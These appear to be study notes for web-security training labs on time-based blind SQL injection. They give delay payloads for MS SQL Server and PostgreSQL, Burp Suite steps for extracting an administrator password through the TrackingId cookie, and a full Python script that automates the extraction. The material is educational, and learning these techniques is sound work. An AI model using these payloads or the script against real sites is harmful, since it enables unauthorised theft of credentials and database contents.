# Blind SQLi triggering time delays and information retrieval
---
- In the preceding example, suppose that the application now catches database errors and handles them gracefully. 
- Triggering a database error when the injected SQL query is executed no longer causes any difference in the application's response. 
- So the preceding technique of inducing conditional errors will not work.

- In this situation, _it is_ often _possible_ to exploit the blind SQL injection vulnerability by _triggering time delays conditionally_, depending on an injected condition.
- Because SQL queries are generally processed synchronously by the application, delaying the execution of a SQL query will also delay the HTTP response. 
- This allows us to infer the truth of the injected condition based on the time taken before the HTTP response is received.

The techniques for triggering a time delay are highly specific to the type of database being used. 
On _Microsoft SQL Server_, input like the following can be used to test a condition and trigger a delay depending on whether the expression is true:
```sql
'; IF (1=2) WAITFOR DELAY '0:0:10'-- 
'; IF (1=1) WAITFOR DELAY '0:0:10'--
```
The _first_ of these inputs will not trigger a delay, because the condition `1=2` is _false_. 
The _second_ input will trigger a delay of 10 seconds, because the condition `1=1` is _true_.

Using this technique, we can retrieve data in the way already described, by systematically testing one character at a time:
```sql
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
```

# Lab: Blind SQL injection with time delays
---
1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the `TrackingId` cookie.
2. Modify the `TrackingId` cookie, changing it to:
    - `TrackingId=x'||pg_sleep(10)--`
3. Submit the request and observe that the application takes 10 seconds to respond.
>[!note]
> The payload can be (_PostgreSQL_)
> 	- `x'||pg_sleep(10)--`
> 	- `x'||(SELECT 1 FROM pg_sleep(10))--`
> 	- or/get more here [PayloadsAllTheThings - SQLi/PostgreSQL/Blind-Time](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-time-based).

# Lab: Blind SQL injection with time delays and information retrieval
---
1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the `TrackingId` cookie.
2. Modify the `TrackingId` cookie, changing it to:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--`
    - Verify that the application takes 10 seconds to respond.
3. Now change it to:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--`
    - Verify that the application responds immediately with no time delay. 
    - This demonstrates how you can test a single boolean condition and infer the result.
4. Now change it to:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
    - Verify that the condition is true, confirming that there is a user called `administrator`.
5. The next step is to determine how many characters are in the password of the `administrator` user. 
    - To do this, change the value to:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
    - This condition should be true, confirming that the password is greater than 1 character in length.
6. Send a series of follow-up values to test different password lengths. Send:
   - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
    - Then send:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
    - And so on. 
    - You can do this manually using [Burp Repeater](https://portswigger.net/burp/documentation/desktop/tools/repeater), since the length is likely to be short. 
    - When the condition stops being true (_i.e. when the application responds immediately without a time delay_), you have determined the length of the password, which is in fact 20 characters long.
7.  After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so you need to use [Burp Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder). Send the request you are working on to Burp Intruder, using the context menu.
8.  In the Positions tab of Burp Intruder, clear the default payload positions by clicking the "Clear §" button.
9.  In the Positions tab, change the value of the cookie to:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
    - This uses the `SUBSTRING()` function to extract a single character from the password, and test it against a specific value. 
    - Our attack will cycle through each position and possible value, testing each one in turn.
10.  Place payload position markers around the `a` character in the cookie value. To do this, select just the `a`, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers):
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
11.  To test the character at each position, you'll need to send suitable payloads in the payload position that you've defined. You can assume that the password contains only lower case alphanumeric characters. Go to the Payloads tab, check that "Simple list" is selected, and under "Payload settings" add the payloads in the range a - z and 0 - 9. You can select these easily using the "Add from list" drop-down.
12.  To be able to tell when the correct character was submitted, you'll need to monitor the time taken for the application to respond to each request. For this process to be as reliable as possible, you need to configure the Intruder attack to issue requests in a single thread. To do this, go to the "Resource pool" tab and add the attack to a resource pool with the "Maximum concurrent requests" set to `1`.
13.  Launch the attack by clicking the "Start attack" button or selecting "Start attack" from the Intruder menu.
14.  Burp Intruder monitors the time taken for the application's response to be received, but by default it does not show this information. To see it, go to the "Columns" menu, and check the box for "Response received".
15.  Review the attack results to find the value of the character at the first position. You should see a column in the results called "Response received". This will generally contain a small number, representing the number of milliseconds the application took to respond. One of the rows should have a larger number in this column, in the region of 10,000 milliseconds. The payload showing for that row is the value of the character at the first position.
16.  Now, you simply need to re-run the attack for each of the other character positions in the password, to determine their value. To do this, go back to the main Burp window, and the Positions tab of Burp Intruder, and change the specified offset from 1 to 2. You should then see the following as the cookie value:
    - `TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--`
17.  Launch the modified attack, review the results, and note the character at the second offset.
18.  Continue this process testing offset 3, 4, and so on, until you have the whole password.
19.  In the browser, click "My account" to open the login page. Use the password to log in as the `administrator` user.

```python
#!/usr/bin/env python3
# Blind SQL injection with time delays and information retrieval (PostgreSQL)
import requests
import string
import time
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def get_length(url, cookie, session):
    for i in range(1,100):
        # '||(SELECT CASE WHEN LENGTH(password)=20 THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--
        sqli = f"'||(SELECT CASE WHEN LENGTH(password)={i} THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--"
        c = {'TrackingId':f'{cookie}{sqli}', 'session':f'{session}'}
        s_time = time.time()
        requests.get(url, cookies=c, verify=False, proxies=p)
        e_time = time.time() - s_time
        if e_time > 5:
            return i
        i = i+1
    return False

def get_password(url, cookie, session, passwd_length):
    admin_passwd = list()
    for i in range(1,passwd_length+1):
        for char in string.printable:
            # '||(SELECT CASE WHEN SUBSTRING(password,1,1)='a' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--
            sqli = f"'||(SELECT CASE WHEN SUBSTRING(password,{i},1)='{char}' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--"
            c = {'TrackingId':f'{cookie}{sqli}', 'session':f'{session}'}
            s_time = time.time()
            requests.get(url, cookies=c, verify=False, proxies=p)
            e_time = time.time() - s_time
            if e_time > 5:
                admin_passwd.append(char)
                break
            x = ''.join(admin_passwd) + char
            sys.stdout.write('\r' + x)
            sys.stdout.flush()

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        cookie = sys.argv[2].strip()
        session = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <cookie_value> <session_value>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com abcdef123 abcdef123".format(sys.argv[0]))
        sys.exit(1)

    print("[-] Finding the password length...")
    passwd_length = get_length(url, cookie, session)
    if passwd_length:
        print("[-] Found the password length... [{}]".format(passwd_length))
        print("[-] Retrieving administrator password...")
        print("[!] Tip... at the end string must replace with next character...")
        get_password(url, cookie, session, passwd_length)
    else:
        print("[-] Can't find the password length!")
```